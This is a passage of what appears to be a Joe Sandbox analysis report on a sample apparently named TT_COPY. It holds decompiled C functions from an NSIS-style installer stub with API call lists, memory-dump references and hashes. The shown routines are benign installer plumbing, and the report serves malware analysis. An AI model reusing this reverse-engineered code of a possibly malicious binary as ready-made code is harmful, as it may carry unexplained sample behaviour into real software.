                                                                                                                            • lstrlenW.KERNEL32(0042C248,00000000,00424A84,75DF23A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                                                                                                                            • lstrlenW.KERNEL32(00403418,0042C248,00000000,00424A84,75DF23A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                                                                                                            • lstrcatW.KERNEL32(0042C248,00403418), ref: 004055FA
                                                                                                                            • SetWindowTextW.USER32(0042C248,0042C248), ref: 0040560C
                                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                                                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                                                                                                            • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                                                                                                                              • Part of subcall function 0040657A: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                                                                                                                              • Part of subcall function 0040657A: lstrlenW.KERNEL32(Call,00000000,0042C248,?,004055D6,0042C248,00000000), ref: 00406779
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1069590569.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1069539735.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069665567.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069705541.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069757377.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069866925.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069912074.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069940321.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069964680.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069994200.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1070016354.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_TT_COPY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSendlstrlen$lstrcat$TextWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1495540970-0
                                                                                                                            • Opcode ID: 61fc35634f83d303f4bb0fdf458391b4626c4708e393b35bd1b1a29fdfa46634
                                                                                                                            • Instruction ID: 138a2a903332092674924c4fce2a37a83712bc812e9b86ab44911e1df8857bb6
                                                                                                                            • Opcode Fuzzy Hash: 61fc35634f83d303f4bb0fdf458391b4626c4708e393b35bd1b1a29fdfa46634
                                                                                                                            • Instruction Fuzzy Hash: C1219071900558BACF11AFA9DD84DDFBF75EF45354F14803AF904B22A0C7794A419F68
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 91%
                                                                                                                            			E004067C4(WCHAR* _a4) {
                                                                                                                            				short _t5;
                                                                                                                            				short _t7;
                                                                                                                            				WCHAR* _t19;
                                                                                                                            				WCHAR* _t20;
                                                                                                                            				WCHAR* _t21;
                                                                                                                            
                                                                                                                            				_t20 = _a4;
                                                                                                                            				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
                                                                                                                            					_t20 =  &(_t20[4]);
                                                                                                                            				}
                                                                                                                            				if( *_t20 != 0 && E00405E83(_t20) != 0) {
                                                                                                                            					_t20 =  &(_t20[2]);
                                                                                                                            				}
                                                                                                                            				_t5 =  *_t20;
                                                                                                                            				_t21 = _t20;
                                                                                                                            				_t19 = _t20;
                                                                                                                            				if(_t5 != 0) {
                                                                                                                            					do {
                                                                                                                            						if(_t5 > 0x1f &&  *((short*)(E00405E39(L"*?|<>/\":", _t5))) == 0) {
                                                                                                                            							E00405FE8(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
                                                                                                                            							_t19 = CharNextW(_t19);
                                                                                                                            						}
                                                                                                                            						_t20 = CharNextW(_t20);
                                                                                                                            						_t5 =  *_t20;
                                                                                                                            					} while (_t5 != 0);
                                                                                                                            				}
                                                                                                                            				 *_t19 =  *_t19 & 0x00000000;
                                                                                                                            				while(1) {
                                                                                                                            					_push(_t19);
                                                                                                                            					_push(_t21);
                                                                                                                            					_t19 = CharPrevW();
                                                                                                                            					_t7 =  *_t19;
                                                                                                                            					if(_t7 != 0x20 && _t7 != 0x5c) {
                                                                                                                            						break;
                                                                                                                            					}
                                                                                                                            					 *_t19 =  *_t19 & 0x00000000;
                                                                                                                            					if(_t21 < _t19) {
                                                                                                                            						continue;
                                                                                                                            					}
                                                                                                                            					break;
                                                                                                                            				}
                                                                                                                            				return _t7;
                                                                                                                            			}








                                                                                                                            0x004067c6
                                                                                                                            0x004067cf
                                                                                                                            0x004067e6
                                                                                                                            0x004067e6
                                                                                                                            0x004067ed
                                                                                                                            0x004067f9
                                                                                                                            0x004067f9
                                                                                                                            0x004067fc
                                                                                                                            0x004067ff
                                                                                                                            0x00406804
                                                                                                                            0x00406806
                                                                                                                            0x0040680f
                                                                                                                            0x00406813
                                                                                                                            0x00406830
                                                                                                                            0x00406838
                                                                                                                            0x00406838
                                                                                                                            0x0040683d
                                                                                                                            0x0040683f
                                                                                                                            0x00406842
                                                                                                                            0x00406847
                                                                                                                            0x00406848
                                                                                                                            0x0040684c
                                                                                                                            0x0040684c
                                                                                                                            0x0040684d
                                                                                                                            0x00406854
                                                                                                                            0x00406856
                                                                                                                            0x0040685d
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00406865
                                                                                                                            0x0040686b
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040686b
                                                                                                                            0x00406870

                                                                                                                            APIs
                                                                                                                            • CharNextW.USER32(?,*?|<>/":,00000000,00000000,75DF3420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406827
                                                                                                                            • CharNextW.USER32(?,?,?,00000000,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406836
                                                                                                                            • CharNextW.USER32(?,00000000,75DF3420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040683B
                                                                                                                            • CharPrevW.USER32(?,?,75DF3420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040684E
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1069590569.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1069539735.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069665567.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069705541.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069757377.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069866925.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069912074.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069940321.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069964680.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069994200.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1070016354.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_TT_COPY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Char$Next$Prev
                                                                                                                            • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                            • API String ID: 589700163-2977677972
                                                                                                                            • Opcode ID: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                                                                                                                            • Instruction ID: 8e05d213a2b26a47bd0c986db1e6a85e10b5e067f284fb5e9645f7af11a9ce3c
                                                                                                                            • Opcode Fuzzy Hash: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                                                                                                                            • Instruction Fuzzy Hash: 7311862780161295DB313B158C44A77A2A8AF58798F56843FED86B32C1E77C8C9282AD
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E00404E54(struct HWND__* _a4, intOrPtr _a8) {
                                                                                                                            				long _v8;
                                                                                                                            				signed char _v12;
                                                                                                                            				unsigned int _v16;
                                                                                                                            				void* _v20;
                                                                                                                            				intOrPtr _v24;
                                                                                                                            				long _v56;
                                                                                                                            				void* _v60;
                                                                                                                            				long _t15;
                                                                                                                            				unsigned int _t19;
                                                                                                                            				signed int _t25;
                                                                                                                            				struct HWND__* _t28;
                                                                                                                            
                                                                                                                            				_t28 = _a4;
                                                                                                                            				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
                                                                                                                            				if(_a8 == 0) {
                                                                                                                            					L4:
                                                                                                                            					_v56 = _t15;
                                                                                                                            					_v60 = 4;
                                                                                                                            					SendMessageW(_t28, 0x113e, 0,  &_v60);
                                                                                                                            					return _v24;
                                                                                                                            				}
                                                                                                                            				_t19 = GetMessagePos();
                                                                                                                            				_v16 = _t19 >> 0x10;
                                                                                                                            				_v20 = _t19;
                                                                                                                            				ScreenToClient(_t28,  &_v20);
                                                                                                                            				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
                                                                                                                            				if((_v12 & 0x00000066) != 0) {
                                                                                                                            					_t15 = _v8;
                                                                                                                            					goto L4;
                                                                                                                            				}
                                                                                                                            				return _t25 | 0xffffffff;
                                                                                                                            			}














                                                                                                                            0x00404e62
                                                                                                                            0x00404e6f
                                                                                                                            0x00404e75
                                                                                                                            0x00404eb3
                                                                                                                            0x00404eb3
                                                                                                                            0x00404ec2
                                                                                                                            0x00404ec9
                                                                                                                            0x00000000
                                                                                                                            0x00404ecb
                                                                                                                            0x00404e77
                                                                                                                            0x00404e86
                                                                                                                            0x00404e8e
                                                                                                                            0x00404e91
                                                                                                                            0x00404ea3
                                                                                                                            0x00404ea9
                                                                                                                            0x00404eb0
                                                                                                                            0x00000000
                                                                                                                            0x00404eb0
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E6F
                                                                                                                            • GetMessagePos.USER32 ref: 00404E77
                                                                                                                            • ScreenToClient.USER32(?,?), ref: 00404E91
                                                                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EA3
                                                                                                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404EC9
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1069590569.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1069539735.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069665567.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069705541.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069757377.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069866925.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069912074.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069940321.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069964680.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069994200.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1070016354.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_TT_COPY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Message$Send$ClientScreen
                                                                                                                            • String ID: f
                                                                                                                            • API String ID: 41195575-1993550816
                                                                                                                            • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                                                                            • Instruction ID: 177f1d0b32132a6560496663958852c5fe6f1b23f9da62007dee57caca3d7f28
                                                                                                                            • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                                                                            • Instruction Fuzzy Hash: 34014C71900219BADB00DBA4DD85BFFBBB8AB54711F10012BBA50B61C0D7B49A058BA5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 73%
                                                                                                                            			E00401E4E(intOrPtr __edx) {
                                                                                                                            				void* __edi;
                                                                                                                            				int _t9;
                                                                                                                            				signed char _t15;
                                                                                                                            				struct HFONT__* _t18;
                                                                                                                            				intOrPtr _t30;
                                                                                                                            				void* _t31;
                                                                                                                            				struct HDC__* _t33;
                                                                                                                            				void* _t35;
                                                                                                                            
                                                                                                                            				_t30 = __edx;
                                                                                                                            				_t33 = GetDC( *(_t35 - 8));
                                                                                                                            				_t9 = E00402D84(2);
                                                                                                                            				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                                                                                                                            				0x40cdf0->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
                                                                                                                            				ReleaseDC( *(_t35 - 8), _t33);
                                                                                                                            				 *0x40ce00 = E00402D84(3);
                                                                                                                            				_t15 =  *((intOrPtr*)(_t35 - 0x20));
                                                                                                                            				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                                                                                                                            				 *0x40ce07 = 1;
                                                                                                                            				 *0x40ce04 = _t15 & 0x00000001;
                                                                                                                            				 *0x40ce05 = _t15 & 0x00000002;
                                                                                                                            				 *0x40ce06 = _t15 & 0x00000004;
                                                                                                                            				E0040657A(_t9, _t31, _t33, "Tahoma",  *((intOrPtr*)(_t35 - 0x2c)));
                                                                                                                            				_t18 = CreateFontIndirectW(0x40cdf0);
                                                                                                                            				_push(_t18);
                                                                                                                            				_push(_t31);
                                                                                                                            				E00406484();
                                                                                                                            				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t35 - 4));
                                                                                                                            				return 0;
                                                                                                                            			}











                                                                                                                            0x00401e4e
                                                                                                                            0x00401e59
                                                                                                                            0x00401e5b
                                                                                                                            0x00401e68
                                                                                                                            0x00401e7f
                                                                                                                            0x00401e84
                                                                                                                            0x00401e91
                                                                                                                            0x00401e96
                                                                                                                            0x00401e9a
                                                                                                                            0x00401ea5
                                                                                                                            0x00401eac
                                                                                                                            0x00401ebe
                                                                                                                            0x00401ec4
                                                                                                                            0x00401ec9
                                                                                                                            0x00401ed3
                                                                                                                            0x00402638
                                                                                                                            0x0040156d
                                                                                                                            0x00402ba4
                                                                                                                            0x00402c2d
                                                                                                                            0x00402c39

                                                                                                                            APIs
                                                                                                                            • GetDC.USER32(?), ref: 00401E51
                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                                                                                                            • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 00401E84
                                                                                                                              • Part of subcall function 0040657A: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                                                                                                                              • Part of subcall function 0040657A: lstrlenW.KERNEL32(Call,00000000,0042C248,?,004055D6,0042C248,00000000), ref: 00406779
                                                                                                                            • CreateFontIndirectW.GDI32(0040CDF0), ref: 00401ED3
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1069590569.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1069539735.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069665567.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069705541.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069757377.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069866925.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069912074.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069940321.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069964680.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069994200.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1070016354.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_TT_COPY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                                                                                                                            • String ID: Tahoma
                                                                                                                            • API String ID: 2584051700-3580928618
                                                                                                                            • Opcode ID: 0465d2832808ea9d6fff4b9245e4cab849096788d5b9b76ed02900a81bf07427
                                                                                                                            • Instruction ID: 78b13ae86a0973dc2b43aa2eb6c1af0beb3c1ef463c522f55250376beecb9f8a
                                                                                                                            • Opcode Fuzzy Hash: 0465d2832808ea9d6fff4b9245e4cab849096788d5b9b76ed02900a81bf07427
                                                                                                                            • Instruction Fuzzy Hash: 7001B571904241EFEB005BB0EE49B9A3FB4BB15301F108A39F541B71D2C7B904458BED
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
                                                                                                                            				short _v132;
                                                                                                                            				int _t11;
                                                                                                                            				int _t20;
                                                                                                                            
                                                                                                                            				if(_a8 == 0x110) {
                                                                                                                            					SetTimer(_a4, 1, 0xfa, 0);
                                                                                                                            					_a8 = 0x113;
                                                                                                                            				}
                                                                                                                            				if(_a8 == 0x113) {
                                                                                                                            					_t20 =  *0x41ea18; // 0x61985
                                                                                                                            					_t11 =  *0x42aa24;
                                                                                                                            					if(_t20 >= _t11) {
                                                                                                                            						_t20 = _t11;
                                                                                                                            					}
                                                                                                                            					wsprintfW( &_v132, L"verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
                                                                                                                            					SetWindowTextW(_a4,  &_v132);
                                                                                                                            					SetDlgItemTextW(_a4, 0x406,  &_v132);
                                                                                                                            				}
                                                                                                                            				return 0;
                                                                                                                            			}






                                                                                                                            0x00402fa3
                                                                                                                            0x00402fb1
                                                                                                                            0x00402fb7
                                                                                                                            0x00402fb7
                                                                                                                            0x00402fc5
                                                                                                                            0x00402fc7
                                                                                                                            0x00402fcd
                                                                                                                            0x00402fd4
                                                                                                                            0x00402fd6
                                                                                                                            0x00402fd6
                                                                                                                            0x00402fec
                                                                                                                            0x00402ffc
                                                                                                                            0x0040300e
                                                                                                                            0x0040300e
                                                                                                                            0x00403016

                                                                                                                            APIs
                                                                                                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
                                                                                                                            • MulDiv.KERNEL32(00061985,00000064,?), ref: 00402FDC
                                                                                                                            • wsprintfW.USER32 ref: 00402FEC
                                                                                                                            • SetWindowTextW.USER32(?,?), ref: 00402FFC
                                                                                                                            • SetDlgItemTextW.USER32(?,00000406,?), ref: 0040300E
                                                                                                                            Strings
                                                                                                                            • verifying installer: %d%%, xrefs: 00402FE6
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1069590569.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1069539735.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069665567.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069705541.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069757377.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069866925.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069912074.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069940321.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069964680.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069994200.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1070016354.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_TT_COPY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                            • String ID: verifying installer: %d%%
                                                                                                                            • API String ID: 1451636040-82062127
                                                                                                                            • Opcode ID: ea3fb41b8b9d1af7e43715991a6ce4dd060937d78b5a266238e4f5c2501e20f6
                                                                                                                            • Instruction ID: eb17ebabde20c32bd565f0ca98bf5c3c7f8a04474e671541d9d17dad0456e96b
                                                                                                                            • Opcode Fuzzy Hash: ea3fb41b8b9d1af7e43715991a6ce4dd060937d78b5a266238e4f5c2501e20f6
                                                                                                                            • Instruction Fuzzy Hash: 20014B7064020DABEF209F60DE4AFEA3B79FB04345F008039FA06B51D0DBB999559F69
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 75%
                                                                                                                            			E70B52655() {
                                                                                                                            				intOrPtr _t24;
                                                                                                                            				void* _t26;
                                                                                                                            				intOrPtr _t27;
                                                                                                                            				signed int _t39;
                                                                                                                            				void* _t40;
                                                                                                                            				void* _t43;
                                                                                                                            				intOrPtr _t44;
                                                                                                                            				void* _t45;
                                                                                                                            
                                                                                                                            				_t40 = E70B512BB();
                                                                                                                            				_t24 =  *((intOrPtr*)(_t45 + 0x18));
                                                                                                                            				_t44 =  *((intOrPtr*)(_t24 + 0x1014));
                                                                                                                            				_t43 = (_t44 + 0x81 << 5) + _t24;
                                                                                                                            				do {
                                                                                                                            					if( *((intOrPtr*)(_t43 - 4)) >= 0) {
                                                                                                                            					}
                                                                                                                            					_t39 =  *(_t43 - 8) & 0x000000ff;
                                                                                                                            					if(_t39 <= 7) {
                                                                                                                            						switch( *((intOrPtr*)(_t39 * 4 +  &M70B52784))) {
                                                                                                                            							case 0:
                                                                                                                            								 *_t40 = 0;
                                                                                                                            								goto L17;
                                                                                                                            							case 1:
                                                                                                                            								__eax =  *__eax;
                                                                                                                            								if(__ecx > __ebx) {
                                                                                                                            									 *(__esp + 0x10) = __ecx;
                                                                                                                            									__ecx =  *(0x70b5407c + __edx * 4);
                                                                                                                            									__edx =  *(__esp + 0x10);
                                                                                                                            									__ecx = __ecx * __edx;
                                                                                                                            									asm("sbb edx, edx");
                                                                                                                            									__edx = __edx & __ecx;
                                                                                                                            									__eax = __eax &  *(0x70b5409c + __edx * 4);
                                                                                                                            								}
                                                                                                                            								_push(__eax);
                                                                                                                            								goto L15;
                                                                                                                            							case 2:
                                                                                                                            								__eax = E70B51510(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
                                                                                                                            								goto L16;
                                                                                                                            							case 3:
                                                                                                                            								__ecx =  *0x70b5506c;
                                                                                                                            								__edx = __ecx - 1;
                                                                                                                            								__eax = MultiByteToWideChar(__ebx, __ebx,  *__eax, __ecx, __edi, __edx);
                                                                                                                            								__eax =  *0x70b5506c;
                                                                                                                            								 *((short*)(__edi + __eax * 2 - 2)) = __bx;
                                                                                                                            								goto L17;
                                                                                                                            							case 4:
                                                                                                                            								__eax = lstrcpynW(__edi,  *__eax,  *0x70b5506c);
                                                                                                                            								goto L17;
                                                                                                                            							case 5:
                                                                                                                            								_push( *0x70b5506c);
                                                                                                                            								_push(__edi);
                                                                                                                            								_push( *__eax);
                                                                                                                            								__imp__StringFromGUID2();
                                                                                                                            								goto L17;
                                                                                                                            							case 6:
                                                                                                                            								_push( *__esi);
                                                                                                                            								L15:
                                                                                                                            								__eax = wsprintfW(__edi, 0x70b55000);
                                                                                                                            								L16:
                                                                                                                            								__esp = __esp + 0xc;
                                                                                                                            								goto L17;
                                                                                                                            						}
                                                                                                                            					}
                                                                                                                            					L17:
                                                                                                                            					_t26 =  *(_t43 + 0x14);
                                                                                                                            					if(_t26 != 0 && ( *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x18)))) != 2 ||  *((intOrPtr*)(_t43 - 4)) > 0)) {
                                                                                                                            						GlobalFree(_t26);
                                                                                                                            					}
                                                                                                                            					_t27 =  *((intOrPtr*)(_t43 + 0xc));
                                                                                                                            					if(_t27 != 0) {
                                                                                                                            						if(_t27 != 0xffffffff) {
                                                                                                                            							if(_t27 > 0) {
                                                                                                                            								E70B51381(_t27 - 1, _t40);
                                                                                                                            								goto L26;
                                                                                                                            							}
                                                                                                                            						} else {
                                                                                                                            							E70B51312(_t40);
                                                                                                                            							L26:
                                                                                                                            						}
                                                                                                                            					}
                                                                                                                            					_t44 = _t44 - 1;
                                                                                                                            					_t43 = _t43 - 0x20;
                                                                                                                            				} while (_t44 >= 0);
                                                                                                                            				return GlobalFree(_t40);
                                                                                                                            			}











                                                                                                                            0x70b5265f
                                                                                                                            0x70b52661
                                                                                                                            0x70b52665
                                                                                                                            0x70b52674
                                                                                                                            0x70b52678
                                                                                                                            0x70b5267d
                                                                                                                            0x70b5267d
                                                                                                                            0x70b52685
                                                                                                                            0x70b5268c
                                                                                                                            0x70b52692
                                                                                                                            0x00000000
                                                                                                                            0x70b52699
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x70b526a1
                                                                                                                            0x70b526a5
                                                                                                                            0x70b526a8
                                                                                                                            0x70b526ac
                                                                                                                            0x70b526b3
                                                                                                                            0x70b526b7
                                                                                                                            0x70b526bd
                                                                                                                            0x70b526bf
                                                                                                                            0x70b526c1
                                                                                                                            0x70b526c1
                                                                                                                            0x70b526c8
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x70b526d1
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x70b526d8
                                                                                                                            0x70b526de
                                                                                                                            0x70b526e8
                                                                                                                            0x70b526ee
                                                                                                                            0x70b526f3
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x70b52714
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x70b526fa
                                                                                                                            0x70b52700
                                                                                                                            0x70b52701
                                                                                                                            0x70b52703
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x70b5271c
                                                                                                                            0x70b5271e
                                                                                                                            0x70b52724
                                                                                                                            0x70b5272a
                                                                                                                            0x70b5272a
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x70b52692
                                                                                                                            0x70b5272d
                                                                                                                            0x70b5272d
                                                                                                                            0x70b52732
                                                                                                                            0x70b52743
                                                                                                                            0x70b52743
                                                                                                                            0x70b52749
                                                                                                                            0x70b5274e
                                                                                                                            0x70b52753
                                                                                                                            0x70b5275f
                                                                                                                            0x70b52764
                                                                                                                            0x00000000
                                                                                                                            0x70b52769
                                                                                                                            0x70b52755
                                                                                                                            0x70b52756
                                                                                                                            0x70b5276a
                                                                                                                            0x70b5276a
                                                                                                                            0x70b52753
                                                                                                                            0x70b5276b
                                                                                                                            0x70b5276c
                                                                                                                            0x70b5276f
                                                                                                                            0x70b52783

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 70B512BB: GlobalAlloc.KERNELBASE(00000040,?,70B512DB,?,70B5137F,00000019,70B511CA,-000000A0), ref: 70B512C5
                                                                                                                            • GlobalFree.KERNEL32(?), ref: 70B52743
                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 70B52778
